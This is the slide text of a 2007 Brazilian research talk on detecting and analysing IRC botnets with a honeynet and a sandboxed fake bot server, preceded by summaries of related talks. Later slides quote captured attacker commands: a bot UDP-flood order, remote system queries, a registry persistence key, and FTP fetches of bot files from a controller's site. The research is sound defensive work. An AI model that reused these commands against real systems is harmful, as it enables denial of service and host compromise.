Este documento apresenta uma metodologia para detectar e analisar botnets utilizando uma honeynet. A metodologia envolve monitorar tráfego suspeito na honeynet, identificar comunicação IRC, analisar sessões IRC para caracterizar a botnet e simular um servidor de botnet para estudar o comportamento dos bots de forma segura.
Este documento descreve um cenário de rede com um filtro de pacotes e define regras para permitir que PCs na rede interna acessem a internet e que um servidor web seja acessado de fora, mas nenhum outro tráfego será permitido. Ele lista as interfaces de rede e serviços de cada dispositivo e as etapas para compartilhar a conexão, permitir loopback, definir política padrão e redirecionar tráfego para o servidor web.
Ferramentas GPL para segurança de redes - Vanderlei PollonTchelinux
O documento apresenta ferramentas de software livre para segurança de redes, descrevendo brevemente ferramentas como John the Ripper para testar senhas, Nmap para varredura de portas, Nessus para detecção de vulnerabilidades, Wireshark para captura de pacotes e Snort como sistema de detecção de intrusos. O palestrante também discute ferramentas como Nikto para análise de servidores web e AIDE para detecção de rootkits.
9 - segurança - ataques buffer-injectionAndre Peres
O documento discute ataques de buffer overflow, explicando como eles podem ser usados para executar código malicioso. Descreve como o overflow invade a pilha e sobrescreve o endereço de retorno para apontar para código inserido pelo atacante. Também explica como o overflow no heap pode alterar ponteiros e unir blocos de memória para causar overflow na pilha.
O documento discute firewalls, incluindo seus objetivos de criar uma barreira de segurança entre redes e controlar o tráfego. Ele explica dois tipos principais de firewalls - firewalls de rede que controlam o tráfego entre subredes, e firewalls de host que controlam o tráfego de/para um host específico. Também descreve técnicas como filtragem de pacotes e uso de proxies de aplicação para inspecionar e filtrar tráfego.
Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.
Criando temas para Joomla, Wordpress, Drupal e tudo mais sem tocar em templa...Simples Consultoria
O documento apresenta uma técnica para criar temas para sistemas de gerenciamento de conteúdo como Joomla, Wordpress e Drupal sem modificar templates diretamente. A técnica utiliza regras XSLT aplicadas por meio do framework Diazo para estilizar o conteúdo de acordo com um tema comum em diferentes sistemas. Exemplos de implantação são mostrados usando proxy reverso, servidor WSGI e Varnish para melhor desempenho.
O documento discute conceitos e configuração de rede em Linux, incluindo endereços IP, máscaras de sub-rede, arquivos de configuração de rede, comandos como ifconfig, route e ferramentas para administração como adicionar rotas e configurar conexão ADSL.
Este documento descreve um cenário de rede com um filtro de pacotes e define regras para permitir que PCs na rede interna acessem a internet e que um servidor web seja acessado de fora, mas nenhum outro tráfego será permitido. Ele lista as interfaces de rede e serviços de cada dispositivo e as etapas para compartilhar a conexão, permitir loopback, definir política padrão e redirecionar tráfego para o servidor web.
Ferramentas GPL para segurança de redes - Vanderlei PollonTchelinux
O documento apresenta ferramentas de software livre para segurança de redes, descrevendo brevemente ferramentas como John the Ripper para testar senhas, Nmap para varredura de portas, Nessus para detecção de vulnerabilidades, Wireshark para captura de pacotes e Snort como sistema de detecção de intrusos. O palestrante também discute ferramentas como Nikto para análise de servidores web e AIDE para detecção de rootkits.
9 - segurança - ataques buffer-injectionAndre Peres
O documento discute ataques de buffer overflow, explicando como eles podem ser usados para executar código malicioso. Descreve como o overflow invade a pilha e sobrescreve o endereço de retorno para apontar para código inserido pelo atacante. Também explica como o overflow no heap pode alterar ponteiros e unir blocos de memória para causar overflow na pilha.
O documento discute firewalls, incluindo seus objetivos de criar uma barreira de segurança entre redes e controlar o tráfego. Ele explica dois tipos principais de firewalls - firewalls de rede que controlam o tráfego entre subredes, e firewalls de host que controlam o tráfego de/para um host específico. Também descreve técnicas como filtragem de pacotes e uso de proxies de aplicação para inspecionar e filtrar tráfego.
Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.
Criando temas para Joomla, Wordpress, Drupal e tudo mais sem tocar em templa...Simples Consultoria
O documento apresenta uma técnica para criar temas para sistemas de gerenciamento de conteúdo como Joomla, Wordpress e Drupal sem modificar templates diretamente. A técnica utiliza regras XSLT aplicadas por meio do framework Diazo para estilizar o conteúdo de acordo com um tema comum em diferentes sistemas. Exemplos de implantação são mostrados usando proxy reverso, servidor WSGI e Varnish para melhor desempenho.
O documento discute conceitos e configuração de rede em Linux, incluindo endereços IP, máscaras de sub-rede, arquivos de configuração de rede, comandos como ifconfig, route e ferramentas para administração como adicionar rotas e configurar conexão ADSL.
O documento discute princípios de segurança na internet, incluindo como a internet foi projetada inicialmente sem considerar segurança e como os ataques se tornaram mais sofisticados ao longo do tempo. Também descreve vários tipos de ataques como negação de serviço, exploração de bugs e protocolos, e mecanismos de defesa como criptografia e filtros de pacotes.
A maioria dos informáticos, incluíndo os que trabalham em segurança, tem apenas noções básicas sobre criptografia assimétrica. A maioria de nós sabe utilizar os vários algoritmos, embora desconheça como operam. Nesta talk pretendo falar um pouco mais em detalhe sobre estes algoritmos, em particular o RSA. Irei falar sobre aplicações práticas de criptografia assimétrica (desde o SSL, passando pela Playstation 3 até ao Cartão do Cidadão), limitações dos algoritmos, ataques aos mesmos e falhas de implementação recentemente conhecidas. O objectivo principal desta talk é desmistificar esta "vaca sagrada" que é a criptografia assimétrica, demonstrando que não é uma panaceia: também tem falhas e limitações.
1. O documento discute sistemas operacionais seguros, com ênfase em comandos Linux para auditoria e segurança de rede.
2. É apresentado o scanner de rede Nmap, descrevendo seus usos principais como varredura de portas, detecção de sistema operacional e mapeamento de serviços.
3. O documento também lista e explica brevemente alguns ataques comuns como engenharia social, varredura, negação de serviço e exploração de vulnerabilidades, assim como ferramentas para análise de logs e detecção de
O documento discute o uso da ferramenta Flow-tools para detecção de intrusão a partir da análise de fluxos de rede. Ele explica o que são fluxos NetFlow, como configurar roteadores e coletores para exportação de dados, e como utilizar ferramentas como Flow-tools, FlowScan e ACME! Flow-Alert para analisar os dados coletados e identificar possíveis ameaças à segurança.
O documento descreve um curso de ética hacker com a ferramenta Backtrack, com 32 horas de duração sobre 4 sábados. O curso ensinará técnicas de hacking ético como reconhecimento de rede, port scanning, exploração de vulnerabilidades e engenharia social usando ferramentas como Nmap, Metasploit e SET.
O documento discute sistemas de detecção de intrusão distribuídos, comparando NIDS, HIDS e DIDS. Também descreve as características e arquitetura do Snort, um popular software NIDS de código aberto.
Este documento discute como monitorar a infraestrutura usando o Elasticsearch. Ele descreve como o Elasticsearch, Kibana e Beats (Winlogbeat, Metricbeat) podem ser usados para indexar, pesquisar e analisar dados em tempo real de CPUs, rede, memória, disco e processos, e fornecer dashboards para visualização. Ele também explica como instalar e configurar esses produtos da Elastic.
O documento discute técnicas de invasão e defesa de sistemas computacionais. Apresenta ferramentas como nmap, nessus e metasploit que podem ser usadas para invasão e também técnicas de defesa como firewalls e sistemas de detecção de intrusão.
O documento fornece um guia passo-a-passo para instalar o MySQL em 10 minutos ou menos. Ele explica como baixar o pacote binário do MySQL, descompactá-lo, criar o usuário e diretórios necessários, configurar as permissões e parâmetros, inicializar o banco de dados e realizar ajustes básicos de segurança antes de deixar o servidor pronto para uso.
Este documento discute a aquisição e análise de memória em investigações forenses em Windows. Ele fornece uma lista de referências como livros, papers e ferramentas que podem ser usadas para realizar análises de memória e comparar as abordagens de análise de memória ao vivo versus imagens de memória. O documento também discute as limitações da resposta ao vivo e apresenta um exemplo laboratorial para testar ferramentas de resposta ao vivo.
O documento explica como funciona a internet, definindo a diferença entre a internet e a web. A internet é uma rede de computadores que suporta várias aplicações como a web, e-mail e transferência de arquivos. A web é acessada por meio de navegadores e permite visualizar páginas. Redes P2P permitem compartilhamento direto entre usuários. Ferramentas como ping e traceroute medem desempenho de redes. Neutralidade de rede garante igualdade no tratamento de pacotes de dados.
O documento explica como funcionam a Internet e a Web, incluindo que a Internet é uma rede de computadores e dispositivos e a Web é uma aplicação que roda sobre a Internet. Também discute navegadores, redes P2P, VoIP e ferramentas de rede como ping e traceroute.
1. O documento fornece instruções sobre ferramentas de varredura de rede como whois, dig e Nmap, bem como sobre a instalação e uso do scanner de vulnerabilidades Nessus.
2. Ele explica como usar whois e dig para obter informações sobre domínios e como usar várias opções de Nmap para realizar varreduras em hosts e redes, como verificar versões de serviço.
3. Também mostra como instalar e configurar o Nessus em sistemas Linux, iniciar varreduras e visualizar relatórios para identificar possíveis
O documento discute técnicas de teste de penetração (pen test) utilizando a distribuição Backtrack Linux. Aborda ferramentas como Nmap, Nikto e SQLMap para varredura de portas e detecção de vulnerabilidades, além de Weevely e John the Ripper para exploração de backdoors e quebra de senhas respectivamente.
O documento apresenta uma palestra sobre Internet das Coisas usando Azure como backend. É descrito o contexto da Internet das Coisas e apresentados os dispositivos Netduino e Arduino, além dos protocolos MQTT e RSMB para comunicação entre dispositivos. É mostrado como usar o Azure para hospedar dados e serviços backend para aplicações da Internet das Coisas.
E-Detective - sistemas de monitoramento e analise forense para redesJose Bittencourt
E-Detective – Soluções para Forense Computacional em Redes
Sistema Essencial para Monitoramento de Internet e Análise Forense
• Decodificação de Protocolos de Rede e Reconstrução de Conteúdo
• Monitoramento de Internet
• Análise Forense e Investigação Cibernética
Este documento apresenta as informações sobre o Desafio Forense ICCyber 2012, incluindo ferramentas digitais como Sleuthkit, Volatility e Wireshark que podem ser úteis para resolver o desafio. O objetivo é descobrir uma frase final respondendo às etapas do desafio.
Este documento descreve uma apresentação sobre gerenciamento de redes com Zabbix. Ele começa explicando o que é um NMS e por que é importante utilizar um. Em seguida, apresenta o Zabbix, descrevendo o que é, suas principais características e funcionalidades. Também discute exemplos práticos de uso, novas funcionalidades da versão 2.0 e a comunidade brasileira do Zabbix.
O documento descreve os passos para instalar e configurar um servidor Debian, incluindo a instalação do sistema operacional, pacotes adicionais, configuração de rede, DNS, DHCP, firewall e proxy para controle de acesso à internet.
O documento discute princípios de segurança na internet, incluindo como a internet foi projetada inicialmente sem considerar segurança e como os ataques se tornaram mais sofisticados ao longo do tempo. Também descreve vários tipos de ataques como negação de serviço, exploração de bugs e protocolos, e mecanismos de defesa como criptografia e filtros de pacotes.
A maioria dos informáticos, incluíndo os que trabalham em segurança, tem apenas noções básicas sobre criptografia assimétrica. A maioria de nós sabe utilizar os vários algoritmos, embora desconheça como operam. Nesta talk pretendo falar um pouco mais em detalhe sobre estes algoritmos, em particular o RSA. Irei falar sobre aplicações práticas de criptografia assimétrica (desde o SSL, passando pela Playstation 3 até ao Cartão do Cidadão), limitações dos algoritmos, ataques aos mesmos e falhas de implementação recentemente conhecidas. O objectivo principal desta talk é desmistificar esta "vaca sagrada" que é a criptografia assimétrica, demonstrando que não é uma panaceia: também tem falhas e limitações.
1. O documento discute sistemas operacionais seguros, com ênfase em comandos Linux para auditoria e segurança de rede.
2. É apresentado o scanner de rede Nmap, descrevendo seus usos principais como varredura de portas, detecção de sistema operacional e mapeamento de serviços.
3. O documento também lista e explica brevemente alguns ataques comuns como engenharia social, varredura, negação de serviço e exploração de vulnerabilidades, assim como ferramentas para análise de logs e detecção de
O documento discute o uso da ferramenta Flow-tools para detecção de intrusão a partir da análise de fluxos de rede. Ele explica o que são fluxos NetFlow, como configurar roteadores e coletores para exportação de dados, e como utilizar ferramentas como Flow-tools, FlowScan e ACME! Flow-Alert para analisar os dados coletados e identificar possíveis ameaças à segurança.
O documento descreve um curso de ética hacker com a ferramenta Backtrack, com 32 horas de duração sobre 4 sábados. O curso ensinará técnicas de hacking ético como reconhecimento de rede, port scanning, exploração de vulnerabilidades e engenharia social usando ferramentas como Nmap, Metasploit e SET.
O documento discute sistemas de detecção de intrusão distribuídos, comparando NIDS, HIDS e DIDS. Também descreve as características e arquitetura do Snort, um popular software NIDS de código aberto.
Este documento discute como monitorar a infraestrutura usando o Elasticsearch. Ele descreve como o Elasticsearch, Kibana e Beats (Winlogbeat, Metricbeat) podem ser usados para indexar, pesquisar e analisar dados em tempo real de CPUs, rede, memória, disco e processos, e fornecer dashboards para visualização. Ele também explica como instalar e configurar esses produtos da Elastic.
O documento discute técnicas de invasão e defesa de sistemas computacionais. Apresenta ferramentas como nmap, nessus e metasploit que podem ser usadas para invasão e também técnicas de defesa como firewalls e sistemas de detecção de intrusão.
O documento fornece um guia passo-a-passo para instalar o MySQL em 10 minutos ou menos. Ele explica como baixar o pacote binário do MySQL, descompactá-lo, criar o usuário e diretórios necessários, configurar as permissões e parâmetros, inicializar o banco de dados e realizar ajustes básicos de segurança antes de deixar o servidor pronto para uso.
Este documento discute a aquisição e análise de memória em investigações forenses em Windows. Ele fornece uma lista de referências como livros, papers e ferramentas que podem ser usadas para realizar análises de memória e comparar as abordagens de análise de memória ao vivo versus imagens de memória. O documento também discute as limitações da resposta ao vivo e apresenta um exemplo laboratorial para testar ferramentas de resposta ao vivo.
O documento explica como funciona a internet, definindo a diferença entre a internet e a web. A internet é uma rede de computadores que suporta várias aplicações como a web, e-mail e transferência de arquivos. A web é acessada por meio de navegadores e permite visualizar páginas. Redes P2P permitem compartilhamento direto entre usuários. Ferramentas como ping e traceroute medem desempenho de redes. Neutralidade de rede garante igualdade no tratamento de pacotes de dados.
O documento explica como funcionam a Internet e a Web, incluindo que a Internet é uma rede de computadores e dispositivos e a Web é uma aplicação que roda sobre a Internet. Também discute navegadores, redes P2P, VoIP e ferramentas de rede como ping e traceroute.
1. O documento fornece instruções sobre ferramentas de varredura de rede como whois, dig e Nmap, bem como sobre a instalação e uso do scanner de vulnerabilidades Nessus.
2. Ele explica como usar whois e dig para obter informações sobre domínios e como usar várias opções de Nmap para realizar varreduras em hosts e redes, como verificar versões de serviço.
3. Também mostra como instalar e configurar o Nessus em sistemas Linux, iniciar varreduras e visualizar relatórios para identificar possíveis
O documento discute técnicas de teste de penetração (pen test) utilizando a distribuição Backtrack Linux. Aborda ferramentas como Nmap, Nikto e SQLMap para varredura de portas e detecção de vulnerabilidades, além de Weevely e John the Ripper para exploração de backdoors e quebra de senhas respectivamente.
O documento apresenta uma palestra sobre Internet das Coisas usando Azure como backend. É descrito o contexto da Internet das Coisas e apresentados os dispositivos Netduino e Arduino, além dos protocolos MQTT e RSMB para comunicação entre dispositivos. É mostrado como usar o Azure para hospedar dados e serviços backend para aplicações da Internet das Coisas.
E-Detective - sistemas de monitoramento e analise forense para redesJose Bittencourt
E-Detective – Soluções para Forense Computacional em Redes
Sistema Essencial para Monitoramento de Internet e Análise Forense
• Decodificação de Protocolos de Rede e Reconstrução de Conteúdo
• Monitoramento de Internet
• Análise Forense e Investigação Cibernética
Este documento apresenta as informações sobre o Desafio Forense ICCyber 2012, incluindo ferramentas digitais como Sleuthkit, Volatility e Wireshark que podem ser úteis para resolver o desafio. O objetivo é descobrir uma frase final respondendo às etapas do desafio.
Este documento descreve uma apresentação sobre gerenciamento de redes com Zabbix. Ele começa explicando o que é um NMS e por que é importante utilizar um. Em seguida, apresenta o Zabbix, descrevendo o que é, suas principais características e funcionalidades. Também discute exemplos práticos de uso, novas funcionalidades da versão 2.0 e a comunidade brasileira do Zabbix.
O documento descreve os passos para instalar e configurar um servidor Debian, incluindo a instalação do sistema operacional, pacotes adicionais, configuração de rede, DNS, DHCP, firewall e proxy para controle de acesso à internet.
1. 27/10/2007 GTS 2007
Detecção e Análise de
Botnets Utilizando Honeynet
Marcelo Carvalho Sacchetin
André Ricardo Abed Grégio
Antonio Montes
CenPRA
Centro de Pesquisas Renato Archer
2. 27/10/2007 GTS 2007 2
Roteiro
• Introdução
• Botnets
• Honeynet CenPRA
• Metodologia de Análise
• Estudo de Caso
• Conclusão
3. 27/10/2007 GTS 2007 3
Introdução
• Crescimento da Internet tem motivado
atividades ilegais no ciberespaço
• Atacantes procuram máquinas:
– Grande capacidade de banda
– Bastante tempo online
• Intuito: formação de botnets
4. 27/10/2007 GTS 2007 4
Introdução
• Termo botnet: robot + network
• Diversas máquinas controladas por um
servidor: protocolo IRC mais comum
• Exemplos: Agobot, SDbot,Spybot, GTBot,
Eggdrop, etc...
5. 27/10/2007 GTS 2007 5
Roteiro
• Introdução
• Botnets
• Honeynet CenPRA
• Metodologia de Análise
• Estudo de Caso
• Conclusão
7. 27/10/2007 GTS 2007 7
Botnets
• Bot server controla os bots
• Ciclo típico de uma botnet:
– Varredura por sistemas vulneráveis
– Comprometimento e instalação do bot
– Bot se conecta no servidor e espera por comandos
– Servidor manda bot realizar varreduras
– Bot realiza a tarefa e retorna resultado
– Servidor manda bot realizar ataques (fecha-se ciclo)
8. 27/10/2007 GTS 2007 8
Botnets
• Ciclo garante manutenção da botnet: ambiente
dinâmico
• Objetivos do atacante:
– Captura de informações
– Aumento da capacidade de ataque (DDoS)
– Envio de SPAMs
– Repositório de malwares
– Armazenamento de conteúdos ilícitos
– Anonimato
9. 27/10/2007 GTS 2007 9
Botnets
• Problemas citados: botnet como uma das
principais preocupações em segurança de
TI atualmente
• Necessidade de combate: estudo, análise,
neutralização,etc..
• Possível abordagem: Honeynets
10. 27/10/2007 GTS 2007 10
Roteiro
• Introdução
• Botnets
• Honeynet CenPRA
• Metodologia de Análise
• Estudo de Caso
• Conclusão
11. 27/10/2007 GTS 2007 11
Honeynet CenPRA
• Honeynet: todo tráfego monitorado é a
princípio considerado suspeito
• Todo tráfego é armazenado e disponível
para análise
• Ambiente controlado: evita que ataques
sejam lançados contra outros alvos na
Internet
12. 27/10/2007 GTS 2007 12
Honeynet CenPRA
• Firewall: entrada permissiva, saída
controlada
• IPS: neutralização de ataques lançados
pelos honeypots comprometidos
• IDS: geração de alertas e monitoramento
de tráfego
13. 27/10/2007 GTS 2007 13
Honeynet CenPRA
• Loghost: armazenamento de tudo que
trafega pela honeynet
• Honeypots: sistemas vulneráveis que
recebem ataques
– Alta interatividade
– Alvo frequente de instalação de diversos bots
15. 27/10/2007 GTS 2007 15
Honeynet CenPRA
• Sandbox: análise dinâmica de malwares
capturados pela honeynet
• Informações capturadas na honeynet
servem para configuração do bot server
falso
• Mecanismos de restauração de estados
da máquina base (que executa bot)
16. 27/10/2007 GTS 2007
Metodologia – passo 1
• Honeynet de alta interatividade do CenPRA:
– Recebe ataques de diversos países, geralmente
culminando no download de malware.
China
Venezuela
Romênia
Polônia
Ataques
Honeynet Alta
Interatividade
CenPRA/MCT
bot
Busca bots
17. 27/10/2007 GTS 2007
Metodologia – passo 3
• Instalação de programas de controle
remoto (bots) => máquinas escravas.
Mecanismos
de filtragem e
monitoração
Honeypot
contaminado
Grécia
México
Colômbia
Servidor
(Canais de Chat)
Controlador
18. 27/10/2007 GTS 2007 18
Honeynet CenPRA
• A infra-estrutura apresentada tem se
mostrado adequada para estudos de
botnets
• Necessidade: desenvolvimento de uma
metodologia para organizar as
informações coletadas e utilizá-las em
análises de botntes
19. 27/10/2007 GTS 2007 19
Roteiro
• Introdução
• Botnets
• Honeynet CenPRA
• Metodologia de Análise
• Estudo de Caso
• Conclusão
20. 27/10/2007 GTS 2007 20
Metodologia de Análise
• Diversos ataques são monitorados
diariamente em nossa honeynet: grande
parte está relacionada a botnets
• Foco nos casos que utilizam IRC por se
observar a sua predominância
• Necessidade: Identificar tráfego IRC e
verificar se há relação com botnets
21. 27/10/2007 GTS 2007 21
Metodologia de Análise
• Utilização de ferramentas livres em cada etapa
da análise:
– Snort [4]
– Tcpdump [5]
– Ngrep [3]
– Honeysnap [7]
– Sebek [6]
– Smart [1]
– Partimage [2]
– Shell scripts
22. 27/10/2007 GTS 2007 22
Metodologia de Análise
• Snort:
– IDS baseado em tráfego de rede
– Base de dados com assinaturas conhecidas
– Geração de alertas: tráfego casa com
assinatura
23. 27/10/2007 GTS 2007 23
Metodologia de Análise
• Tcpdump:
– Captura de tráfego de rede
– Salva dados em formato pcap
– Suporte a filtros BPF
24. 27/10/2007 GTS 2007 24
Metodologia de Análise
• Ngrep:
– Busca por expressões regulares ou
caracteres hexadecimais em arquivos pcap
– Simples e eficiente para identificar tráfego
IRC na rede
25. 27/10/2007 GTS 2007 25
Metodologia de Análise
• Honeysnap:
– Ferramenta para analisar tráfego em formato
pcap gerando sumários contendo:
• Sessões HTTP
• Emails
• Dados coletados pelo sebek
• Arquivos baixados via FTP ou HTTP
26. 27/10/2007 GTS 2007 26
Metodologia de Análise
• Sebek:
– Captura de dados no honeypot:
• Pressionamento de teclas pelo atacante
• Conversas em bate-papos (Ex: chat IRC)
• Comandos executados pelo atacante
• Coleta local: dados são capturados em claro
mesmo que o atacante utilize criptografia (Ex:
acesso ao honeypot por SSH)
27. 27/10/2007 GTS 2007 27
Metodologia de Análise
• Smart:
– Similar ao Sebek
– Desenvolvido para suprir necessidades
específicas da Honeynet BR (maior
compatibilidade com nossa infra-estrutura)
28. 27/10/2007 GTS 2007 28
Metodologia de Análise
• Partimage:
– Gera imagens de um determinado estado de
um sistema operacional
– Útil para restaurar sistema após análise
dinâmica na sandbox
29. 27/10/2007 GTS 2007 29
Metodologia de Análise
• Shell scripts:
– Utilizados no IDS para manipular dados
coletados:
• Geração de sumários
• Envio de alertas em tempo real
• Rotacionamento de logs
30. 27/10/2007 GTS 2007 30
Metodologia de Análise
• Trabalhando com as ferramentas:
– Primeira fonte de informação: sumários
enviados pela IDS
• Listas de hosts que acessaram a honeynet
• Portas acessadas
• Protocolos (TCP,UDP,ICMP) utilizados
• Assinaturas de S.O.s do atacante
• Lista de suspeitas de backdoors, ou atividades de
botnets (mesmo IP acessando honeypots em
diferentes portas)
32. 27/10/2007 GTS 2007 32
Metodologia de Análise
• Além dos sumários diários, são gerados
alertas em caso de comprometimento de
honeypots:
– Dados gerados pelo Sebek e Smart são
enviados por email assim que a IDS os obtém
36. 27/10/2007 GTS 2007 36
Metodologia de Análise
• Informações de interesse:
– Honeypot XX.XX.XX.37 comunicação IRC
– Canal #aDDa
– Servidor XX.XX.XX.80 porta 10324
37. 27/10/2007 GTS 2007 37
Metodologia de Análise
• Análise da sessão
• Tcpdump:
#tcpdump -X -s 1500 -nr /var/log/tcpdump/dump_20070310 host
XX.XX.XX.80 and host XX.XX.XX.37 and port 10324
• É possível obter-se: lista de canais,
tópicos de canais, senhas, nicknames, etc
38. 27/10/2007 GTS 2007 38
Metodologia de Análise
• Entretanto, a ferramenta honeysnap
fornece uma visualização mais amigável
dos mesmos dados que podem ser
obtidos pelo tcpdump
#honeysnap /var/log/tcpdump/dump_20070117 -H XX.XX.XX.164 --do-
irc --irc-ports=80
• Output:
39. 27/10/2007 GTS 2007 39
Metodologia de Análise
Wed Jan 17 00:29:38 2007 XX.XX.XX.164:4251 -> XX.XX.13.91:80 pass None
<zip0.compresspass>
Wed Jan 17 00:29:39 2007 XX.XX.XX.164:4251 -> XX.XX.13.91:80 nick None
[0]USA|0309293
Wed Jan 17 00:29:39 2007 XX.XX.XX.164:4251 -> XX.XX.13.91:80 user None
eexakewk 0 0 [0]USA|0309293
Wed Jan 17 00:29:40 2007 XX.XX.13.91:80 -> XX.XX.XX.164:4251 welcome
zip0.rar0 [0]USA|0309293 Welcome to the zip0 IRC Network
[0]USA|0309293!eexakewk@XX.XX.XX.164
Wed Jan 17 00:29:40 2007 XX.XX.13.91:80 -> XX.XX.XX.164:4251 yourhost
zip0.rar0 [0]USA|0309293 Your host is zip0.rar0, running version Unreal3.2
Wed Jan 17 00:29:40 2007 XX.XX.13.91:80 -> XX.XX.XX.164:4251 created
zip0.rar0 [0]USA|0309293 This server was created Thu Dec 28 2006 at 11:29:45
PST
Wed Jan 17 00:29:40 2007 XX.XX.13.91:80 -> XX.XX.XX.164:4251 myinfo
zip0.rar0 [0]USA|0309293 zip0.rar0 Unreal3.2
iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT
Wed Jan 17 00:29:40 2007 XX.XX.XX.164:4251 -> XX.XX.13.91:80 join None
#zip0-s#,#zip0-d1#,#zip0-d2# compress
40. 27/10/2007 GTS 2007 40
Metodologia de Análise
• Informações de interesse:
– Honeypot XX.XX.XX.164 comunicação IRC
– Servidor XX.XX.13.91 porta 80
– Senha do servidor: <zip0.compresspass>
– Nickname utilizado: [0]USA|0309293
– Nome da Botnet: zip0 IRC Network
– Canais: #zip0-s#,#zip0-d1#,#zip0-d2#
41. 27/10/2007 GTS 2007 41
Metodologia de Análise
• Todas informações coletadas até o
momento são importantes para identificar
e caracterizar uma determinada botnet
• Entretanto, pouco se sabe sobre seus
objetivos
• Solução: análise dinâmica em uma
sandbox
42. 27/10/2007 GTS 2007 42
Metodologia de Análise
• Análise dinâmica, implicações:
– Utilização dos mesmos nicknames, com o
mesmo endereço IP de origem, realizando
atividades não esperadas pelo controlador de
botnet: risco de identificação da análise e da
honeynet
– Tempo de resposta: controlador pode
modificar seu bot rapidamente
44. 27/10/2007 GTS 2007 44
Metodologia de Análise
• Análise dinâmica, solução: Sandbox
simulando botserver real
45. 27/10/2007 GTS 2007 45
Metodologia de Análise
• Todas informações obtidas (nome do
servidor, canais, tópicos dos canais, etc)
são utilizadas para configurar o servidor
fictício
• Bot é executado em sistema isolado da
Internet. Acesso somente ao servidor falso
46. 27/10/2007 GTS 2007 46
Metodologia de Análise
• Ao final de cada análise o disco do
sistema base é zerado e seu estado é
recuperado utilizando-se a ferramenta
partimage
• Pelo estudo de caso apresentado a seguir
pode-se verificar melhor o funcionamento
da metodologia
47. 27/10/2007 GTS 2007 47
Roteiro
• Introdução
• Botnets
• Honeynet CenPRA
• Metodologia de Análise
• Estudo de Caso
• Conclusão
48. 27/10/2007 GTS 2007 48
Estudo de Caso
• Botnet “zip0”
• Analisando mais a fundo dados gerados
pelo honeysnap obtém-se:
Channel Users Topic
#zip0-d1# 1646 [+smntMCu] adv5c4n napi_139 50 3 0 -r -t -s
#zip0-d2# 1646 [+smntMCu] adv5c4n napi_445 50 3 0 -r -t -s
49. 27/10/2007 GTS 2007 49
Estudo de Caso
• Configuração bot server na sandbox:
– Tcpdump e snort em execução
– Responde DNS como: compress.zip0.com.ar
– Servidor IRC com todas as características já
observadas: nomes e tópicos de canais,
senhas, etc, idênticos ao servidor real
50. 27/10/2007 GTS 2007 50
Estudo de Caso
• Configuração bot client na sandbox:
– Disco do sistema base é zerado
– Restaura-se o mesmo S.O. do honeypot
comprometido (Windows)
– Na máquina recém instalada é executado
apenas o bot capturado (h.exe)
51. 27/10/2007 GTS 2007 51
Estudo de Caso
• Depois de quase uma hora em execução,
os dados capturados no servidor
(tcpdump) são analisados
• Também é realizada uma análise forense
na máquina base que executou o artefato
52. 27/10/2007 GTS 2007 52
Estudo de Caso
• Resultados:
– O artefato (h.exe) se instala na máquina com
o nome MSSCF32.exe e faz alterações no
registro para que o bot entre em execução
após cada boot do sistema
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVe
rsionRun] "MS System Call Function"="MSSCF32.exe"
53. 27/10/2007 GTS 2007 53
Estudo de Caso
• Resultados:
– Em execução, MSSCF32.exe faz requisições
DNS perguntando por compress.zip0.com.ar
00:15:57.601377 IP 192.168.0.55.1038 > 192.168.0.254.53: 52974+
A? compress.zip0.com.ar. (38)
54. 27/10/2007 GTS 2007 54
Estudo de Caso
• Resultados:
– O bot se conecta no servidor falso, e após 40
minutos de inatividade, os seguintes dados
são capturados pelo sebek:
[SCAN]: Random Port Scan started on XX.XX.x.x:445 with a delay of 3
seconds for 0 minutes using 50 threads.
– Tópico do canal #zip0-d2#:
#zip0-d2# 1646 [+smntMCu] adv5c4n napi_445 50 3 0 -r -t -s
55. 27/10/2007 GTS 2007 55
Estudo de Caso
• Resultados:
– O tráfego de rede capturado pelo tcpdump
confirma a varredura iniciada pelo bot:
00:29:42.546634 192.168.0.55.4650 > XX.XX.164.124.445: S
388531280:388531280(0) win 16384 <mss 1460,nop,nop,sackOK>
(DF)
00:29:42.604849 192.168.0.55.4653 > XX.XX.104.166.445: S
388684351:388684351(0) win 16384 <mss 1460,nop,nop,sackOK>
(DF)
56. 27/10/2007 GTS 2007
Estudo de Caso 2
• Who watches the watchmen?
– Honeypot comprometido em março de 2007:
– Honeypot comprometido: força-bruta de ssh;
– Instalado um bot do tipo eMech para Linux;
– Conectou-se à Undernet e foi retirado para
análise.
– A partir de um host em outra rede, conectou-se ao
canal pré-configurado através do BitchX.
– Controlador do canal manifestou-se, e foram
mantidos chats entre março e abril de 2007.
57. 27/10/2007 GTS 2007
Chats – Lições I
• Canal com botclients de Linux, comandos
através de mensagens:
– Flooding:
<CC> !shellbr @udpflood XX.YY.120.46 9000 400
<bot> (@UDP) Attacking: XX.YY.120.46 with: 9000 Kb packets for: 400 seconds.)
– ID:
<CC> bot id
<bot> uid=1001(apache) gid=1001(apache) groups=1001(apache)
58. 27/10/2007 GTS 2007
Chats – Lições I
• Canal com botclients de Linux, comandos
através de mensagens:
– S.O./Users:
<CC> bot uname -a ;w
<bot> Linux host.domain.cz 2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 09:40:21 EST
2007 x86_64 x86_64 x86_64 GNU/Linux
<bot> 20:36:46 up 5 days, 11:01, 1 user, load average: 1.85, 2.30, 2.53
<bot> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
<bot> viper pts/0 xxx.yy.94.35.ads 18:55 58:36 9:49 0.01s sshd:
59. 27/10/2007 GTS 2007
Chats – Lições II
• Invasões feitas através de força-bruta (ssh) ou
exploração de vulnerabilidades do PHP;
• Divisão de tarefas entre os zumbis:
– Manter os “nomes” dos canais (eMech, eggdrop);
– Executar comandos no alvo, i.e., recuperar
informações sensíveis, lançar DoS, etc (Cmdshell,
perlbots) .
60. 27/10/2007 GTS 2007
Cheating the Cheater
• Foi instalado um honeypot Windows em uma
outra rede, para servir de isca:
– [Eu] Tenho uma shell, vamos instalar um bot?
– [CC] does the box has perl? FTP? Wget?
– [CC] ftp -nvdA <Site_CC>
– [CC] get power.rar / rar.exe / pslist.exe / pskill.exe
• Power => bot do tipo eMech. O CC forneceu os
